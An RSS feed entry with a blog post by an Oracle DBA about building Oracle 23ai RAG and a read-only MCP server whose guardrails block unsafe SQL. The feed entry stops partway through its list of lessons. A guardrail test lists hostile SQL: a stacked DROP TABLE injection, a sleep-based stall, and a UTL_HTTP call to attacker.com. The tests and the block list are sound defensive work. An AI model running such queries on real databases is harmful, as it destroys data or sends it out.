<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Ranjith Kumar Kondoju</title>
    <description>The latest articles on DEV Community by Ranjith Kumar Kondoju (@rkondoju).</description>
    <link>https://dev.to/rkondoju</link>
    
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/rkondoju"/>
    <language>en</language>
    <item>
      <title>An Oracle DBA builds AI: shipping Oracle 23ai RAG and an MCP server in a weekend</title>
      <dc:creator>Ranjith Kumar Kondoju</dc:creator>
      <pubDate>Wed, 13 May 2026 22:07:38 +0000</pubDate>
      <link>https://dev.to/rkondoju/an-oracle-dba-builds-ai-shipping-oracle-23ai-rag-and-an-mcp-server-in-a-weekend-h3i</link>
      <guid>https://dev.to/rkondoju/an-oracle-dba-builds-ai-shipping-oracle-23ai-rag-and-an-mcp-server-in-a-weekend-h3i</guid>
      <description>&lt;p&gt;I asked Claude to 'DROP TABLE' on my Oracle database.&lt;/p&gt;

&lt;p&gt;It tried. The guardrails refused. The audit log captured it.&lt;/p&gt;

&lt;p&gt;That's the demo screenshot at the top of &lt;a href="https://github.com/shopsmartai/mcp-oracle-dba" rel="noopener noreferrer"&gt;&lt;code&gt;mcp-oracle-dba&lt;/code&gt;&lt;/a&gt;, one of two open-source repos I shipped this weekend as an Oracle Apps DBA learning AI infrastructure. The other is &lt;a href="https://github.com/shopsmartai/oracle-ebs-rag" rel="noopener noreferrer"&gt;&lt;code&gt;oracle-ebs-rag&lt;/code&gt;&lt;/a&gt; — a retrieval-augmented chat assistant over Oracle E-Business Suite resolution notes, running on Oracle Database 23ai's native vector search.&lt;/p&gt;

&lt;p&gt;Both repos are MIT-licensed. Datasets are fully synthetic.&lt;/p&gt;

&lt;p&gt;This post is about what I learned. Not the tutorial-level "here's how to call an embedding API" stuff — the actual production-shaped lessons that took an hour of head-scratching each. If you're an Oracle DBA watching AI from the sidelines, my hope is this post saves you those hours.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why an Oracle DBA, of all people
&lt;/h2&gt;

&lt;p&gt;The 2026 narrative is "AI is replacing DBAs." Look at any tech-jobs Twitter thread and you'll find it.&lt;/p&gt;

&lt;p&gt;The reality I've found is closer to &lt;strong&gt;"DBAs who can ship AI infrastructure replace DBAs who can't."&lt;/strong&gt; Production AI is mostly infrastructure: connection pooling, statement timeouts, audit logs, schema allowlists, PII redaction, prompt caching, cost monitoring. Every one of those is something DBAs already think about daily. It's &lt;em&gt;not&lt;/em&gt; ML research.&lt;/p&gt;

&lt;p&gt;I'm an Oracle Apps DBA. Day job is running production Oracle E-Business Suite R12.2 — upgrades, cloning, patching, &lt;code&gt;adop&lt;/code&gt; troubleshooting, performance tuning, plus database administration on Oracle 19c. Ansible for automation. OCI for cloud. Standard stack.&lt;/p&gt;

&lt;p&gt;What surprised me about building AI infrastructure: my Oracle skills transferred more cleanly than I expected. The new piece is &lt;em&gt;small&lt;/em&gt; compared to the production-engineering scaffolding around it.&lt;/p&gt;

&lt;p&gt;Here's the proof, then the lessons.&lt;/p&gt;




&lt;h2&gt;
  
  
  What I built
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Talk to EBS — RAG over Oracle E-Business Suite
&lt;/h3&gt;

&lt;p&gt;A chat interface where I ask plain-English questions about EBS production scenarios and the system responds with grounded answers and inline citations to the source notes.&lt;/p&gt;

&lt;p&gt;  &lt;iframe src="https://www.youtube.com/embed/HDMUIlwQl-I"&gt;
  &lt;/iframe&gt;
&lt;/p&gt;

&lt;p&gt;The stack:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Oracle Database 23ai Free&lt;/strong&gt; in Docker (via OrbStack on Apple Silicon). Native &lt;code&gt;VECTOR(1024, FLOAT32)&lt;/code&gt; datatype, &lt;code&gt;VECTOR_DISTANCE&lt;/code&gt; function with cosine similarity. &lt;strong&gt;No external vector database. No Pinecone, no Weaviate, no Milvus.&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cohere &lt;code&gt;embed-english-v3.0&lt;/code&gt;&lt;/strong&gt; for embeddings (1024 dimensions, free tier is generous).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Claude Sonnet&lt;/strong&gt; with prompt caching for grounded generation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Streamlit&lt;/strong&gt; chat UI with streaming responses, citations panel, and a sidebar that tracks live cost and prompt-cache hit rate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;uv&lt;/code&gt;&lt;/strong&gt; for Python project management.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The dataset is 3 synthetic resolution notes covering concurrent-manager troubleshooting, workflow mailer issues, and &lt;code&gt;adop&lt;/code&gt; patching failures. Each note has YAML frontmatter and is split on Markdown H2 headings (Symptom / Diagnosis / Root cause / Resolution) into 5–6 chunks. That's about 17 chunks total in the vector store.&lt;/p&gt;

&lt;p&gt;Eval harness with Claude Haiku as judge over a 10-question golden set. Current baseline:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Result&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Retrieval recall @ 6&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100 %&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Must-contain pass&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100 %&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Must-not-contain pass&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;100 %&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Claude Haiku judge avg&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;4.80 / 5&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;CI regression gate in &lt;code&gt;.github/workflows/eval.yml&lt;/code&gt; fails the build on &amp;gt;5 percentage-point drop on any metric. Zero tolerance on &lt;code&gt;must_not_contain&lt;/code&gt; (forbidden-claim violations).&lt;/p&gt;

&lt;h3&gt;
  
  
  mcp-oracle-dba — A Model Context Protocol server for Oracle
&lt;/h3&gt;

&lt;p&gt;This one is the more unusual project. MCP is a protocol Anthropic released that lets any compatible client (Claude Desktop, Claude Code, Cursor) plug in tools written in any language. Most "let your LLM query the database" demos hand the LLM a connection string and trust it not to call &lt;code&gt;DROP TABLE&lt;/code&gt;. This server flips that.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcom0xqvh736ddhd34xxy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcom0xqvh736ddhd34xxy.png" alt="mcp-oracle-dba demo" width="800" height="744"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Above: real conversation through Claude Desktop. Claude runs &lt;code&gt;list_schemas&lt;/code&gt;, &lt;code&gt;describe_table&lt;/code&gt;, &lt;code&gt;run_select&lt;/code&gt; against my Oracle 23ai — then is refused when it tries to &lt;code&gt;DROP TABLE&lt;/code&gt;. The rejection lands in &lt;code&gt;audit.log&lt;/code&gt; as a JSON line.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Five tools exposed:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;list_schemas       → returns the allowlist of schemas the server can query
describe_table     → column metadata for SCHEMA.TABLE
run_select         → executes a SELECT / WITH, row-capped, PII-redacted
explain_plan       → returns DBMS_XPLAN.DISPLAY output
top_sql            → top SQL by elapsed time from v$sql in the last N min
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Five independent guardrail layers reject unsafe input before it reaches Oracle:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Single-statement parser&lt;/strong&gt; — rejects &lt;code&gt;... ; DROP TABLE x&lt;/code&gt; injection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;First-keyword allowlist&lt;/strong&gt; — only &lt;code&gt;SELECT&lt;/code&gt; and &lt;code&gt;WITH&lt;/code&gt; accepted.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Banned-keyword scan&lt;/strong&gt; — DML, DDL, PL/SQL blocks, transaction control blocked anywhere in the statement.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dangerous-package regex&lt;/strong&gt; — blocks &lt;code&gt;DBMS_*&lt;/code&gt;, &lt;code&gt;UTL_*&lt;/code&gt;, &lt;code&gt;SYS.*&lt;/code&gt; calls (think &lt;code&gt;DBMS_LOCK.sleep&lt;/code&gt;, &lt;code&gt;UTL_HTTP.request&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hard row cap&lt;/strong&gt; — every approved query gets wrapped in &lt;code&gt;SELECT * FROM (...) FETCH FIRST :N ROWS ONLY&lt;/code&gt;.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Plus a read-only DB user, schema allowlist for introspection, PII column redaction by name substring (&lt;code&gt;SSN&lt;/code&gt;, &lt;code&gt;SALARY&lt;/code&gt;, &lt;code&gt;PASSWORD&lt;/code&gt;…), JSON audit log of every call, and server-side statement timeout via &lt;code&gt;oracledb&lt;/code&gt;'s &lt;code&gt;call_timeout&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;There are 45 security tests in &lt;code&gt;tests/test_guardrails.py&lt;/code&gt;. Every test maps to a real attack vector. Sample:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="nd"&gt;@pytest.mark.parametrize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sql&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT 1 FROM dual; DROP TABLE fnd_user&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;BEGIN dbms_lock.sleep(60); END;&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT dbms_random.value FROM dual&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT utl_http.request(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;http://attacker.com&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;) FROM dual&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;MERGE INTO target USING source ON (...) WHEN MATCHED THEN UPDATE...&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;])&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_blocks_dangerous_sql&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sql&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="n"&gt;pytest&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;raises&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;SqlGuardError&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="nf"&gt;validate_select&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sql&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When I wired the MCP server up to Claude Desktop and asked Claude to drop a table, this is what the audit log captured:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nl"&gt;"ts"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"2026-05-13T01:07:39Z"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"tool"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"run_select"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
 &lt;/span&gt;&lt;span class="nl"&gt;"sql"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"DROP TABLE ragapp.rag_documents"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
 &lt;/span&gt;&lt;span class="nl"&gt;"rejected"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Only SELECT and WITH allowed; got: DROP"&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Claude got back a clean error message and reported to me that the operation was refused. No SQL ever reached Oracle.&lt;/p&gt;




&lt;h2&gt;
  
  
  The five bugs that taught me the most
&lt;/h2&gt;

&lt;p&gt;Here's the meat. Each of these cost me about an hour. If you build something similar, you'll likely hit at least two of them.&lt;/p&gt;

&lt;h3&gt;
  
  
  1. OrbStack's macOS port-forward NAT silently mangles Oracle TNS handshakes
&lt;/h3&gt;

&lt;p&gt;Symptom: &lt;code&gt;python-oracledb&lt;/code&gt; thin-mode connection from my Mac to the Oracle container fails immediately with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;oracledb.exceptions.DatabaseError: DPY-4011: the database or
network closed the connection
[Errno 54] Connection reset by peer
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The listener's text trace log shows nothing — only successful &lt;code&gt;sqlplus&lt;/code&gt; connections from inside the container. After half an hour of trying &lt;code&gt;127.0.0.1&lt;/code&gt; vs &lt;code&gt;localhost&lt;/code&gt;, OOB disable, TNS descriptor format, and force-registering the service, the smoking gun finally surfaced in the &lt;em&gt;XML&lt;/em&gt; listener alert log (different file from the trace log):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;* (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.215.0)(PORT=63905))
* &amp;lt;unknown connect data&amp;gt; * 12537
TNS-12537: TNS:connection closed
TNS-12560: Database communication protocol error
TNS-00507: Connection closed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;&amp;lt;unknown connect data&amp;gt;&lt;/code&gt; — the listener received the connect packet but couldn't parse it. The source IP was OrbStack's NAT gateway (&lt;code&gt;.215.0&lt;/code&gt;), not my host or the container.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; don't go through &lt;code&gt;127.0.0.1&lt;/code&gt; at all. OrbStack on macOS gives each container an &lt;code&gt;&amp;lt;container-name&amp;gt;.orb.local&lt;/code&gt; hostname that routes natively without NAT. So:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Before — fails
&lt;/span&gt;&lt;span class="n"&gt;DSN&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;127.0.0.1:1521/FREEPDB1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="c1"&gt;# After — works
&lt;/span&gt;&lt;span class="n"&gt;DSN&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;oracle23ai.orb.local:1521/FREEPDB1&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same Oracle, same Python, same code path. Different DNS path. Connection succeeds.&lt;/p&gt;

&lt;p&gt;This is documented exactly zero places I could find. Filed it under "things you only learn by hitting them."&lt;/p&gt;

&lt;h3&gt;
  
  
  2. Sandboxed macOS apps can't resolve &lt;code&gt;*.orb.local&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;This bit me a second time, an hour later. After getting my terminal scripts to work with &lt;code&gt;oracle23ai.orb.local&lt;/code&gt;, I wired the MCP server into Claude Desktop and watched &lt;code&gt;list_schemas&lt;/code&gt; succeed but &lt;code&gt;run_select&lt;/code&gt; fail with the same &lt;code&gt;No route to host&lt;/code&gt; error.&lt;/p&gt;

&lt;p&gt;Why? Claude Desktop is a sandboxed macOS app. When it spawns the MCP server as a child process, that child process inherits the sandbox — and the sandbox doesn't have access to OrbStack's DNS resolver. So &lt;code&gt;oracle23ai.orb.local&lt;/code&gt; doesn't resolve.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; use the container's direct IP, which routes through normal kernel networking:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;CONTAINER_IP&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;docker inspect oracle23ai &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--format&lt;/span&gt; &lt;span class="s1"&gt;'{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}'&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="c"&gt;# Then: ORA_DSN=$CONTAINER_IP:1521/FREEPDB1&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The IP can change on container recreate, but it's stable across restarts. For a dev tool, that's a fair trade.&lt;/p&gt;

&lt;p&gt;This one is now in the README's troubleshooting section. I expect every Mac user who wires up an MCP server with a Dockerised Oracle to hit this.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. &lt;code&gt;SELECT_CATALOG_ROLE&lt;/code&gt; replaces three explicit V$ grants
&lt;/h3&gt;

&lt;p&gt;My first cut of the read-only user setup had this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;USER&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt; &lt;span class="n"&gt;IDENTIFIED&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="nv"&gt;"..."&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;GRANT&lt;/span&gt; &lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;SESSION&lt;/span&gt; &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;GRANT&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;v_&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="k"&gt;sql&lt;/span&gt;       &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;-- fails&lt;/span&gt;
&lt;span class="k"&gt;GRANT&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;v_&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="k"&gt;session&lt;/span&gt;   &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;-- fails&lt;/span&gt;
&lt;span class="k"&gt;GRANT&lt;/span&gt; &lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="k"&gt;ON&lt;/span&gt; &lt;span class="n"&gt;v_&lt;/span&gt;&lt;span class="err"&gt;$&lt;/span&gt;&lt;span class="n"&gt;pdbs&lt;/span&gt;      &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;-- fails&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three &lt;code&gt;ORA-00942: table or view does not exist&lt;/code&gt; errors. The &lt;code&gt;V_$&lt;/code&gt; views are owned by &lt;code&gt;SYS&lt;/code&gt;. &lt;code&gt;SYSTEM&lt;/code&gt; has the DBA role and can read them, but to &lt;em&gt;grant&lt;/em&gt; them onward you need to be &lt;code&gt;SYS&lt;/code&gt; or have explicit &lt;code&gt;WITH GRANT OPTION&lt;/code&gt;. None of those things are true by default.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;GRANT&lt;/span&gt; &lt;span class="n"&gt;SELECT_CATALOG_ROLE&lt;/span&gt; &lt;span class="k"&gt;TO&lt;/span&gt; &lt;span class="n"&gt;mcp_ro&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That one role covers every &lt;code&gt;V$&lt;/code&gt; and &lt;code&gt;DBA_*&lt;/code&gt; view in the dictionary, in one line. It's the right answer for any service that needs to introspect Oracle. No &lt;code&gt;SYS&lt;/code&gt;-grantor problem.&lt;/p&gt;

&lt;p&gt;Bonus: the same script also tried &lt;code&gt;GRANT CREATE INDEX TO ragapp&lt;/code&gt; — which fails because &lt;code&gt;CREATE INDEX&lt;/code&gt; isn't a system privilege for tables you own; it's implicit with &lt;code&gt;CREATE TABLE&lt;/code&gt;. Common muscle-memory error from PostgreSQL or MySQL.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. sqlparse tags CTE statements as &lt;code&gt;Keyword.CTE&lt;/code&gt;, not &lt;code&gt;DML&lt;/code&gt;
&lt;/h3&gt;

&lt;p&gt;My SQL guardrail had this strict check:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;sqlparse.tokens&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DML&lt;/span&gt;

&lt;span class="n"&gt;first_token&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;next&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;stmt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;tokens&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;t&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;is_whitespace&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="bp"&gt;None&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;first_token&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ttype&lt;/span&gt; &lt;span class="ow"&gt;is&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;DML&lt;/span&gt; &lt;span class="ow"&gt;or&lt;/span&gt; &lt;span class="n"&gt;first_token&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;upper&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;WITH&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;}:&lt;/span&gt;
    &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;SqlGuardError&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Only SELECT and WITH allowed&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The unit test I'd written deliberately included &lt;code&gt;WITH t AS (SELECT 1 FROM dual) SELECT * FROM t&lt;/code&gt; to make sure CTEs would pass. It failed on the first run.&lt;/p&gt;

&lt;p&gt;Reason: sqlparse classifies &lt;code&gt;WITH&lt;/code&gt; as &lt;code&gt;Token.Keyword.CTE&lt;/code&gt; (a subtype of &lt;code&gt;Keyword&lt;/code&gt;), &lt;em&gt;not&lt;/em&gt; &lt;code&gt;Token.Keyword.DML&lt;/code&gt;. My type check rejected it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The fix:&lt;/strong&gt; stop relying on token type for the first-keyword check and lean on the other guardrails:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;first_val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;first_token&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;upper&lt;/span&gt;&lt;span class="p"&gt;().&lt;/span&gt;&lt;span class="nf"&gt;strip&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;first_val&lt;/span&gt; &lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;WITH&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;}:&lt;/span&gt;
    &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;SqlGuardError&lt;/span&gt;&lt;span class="p"&gt;(...)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



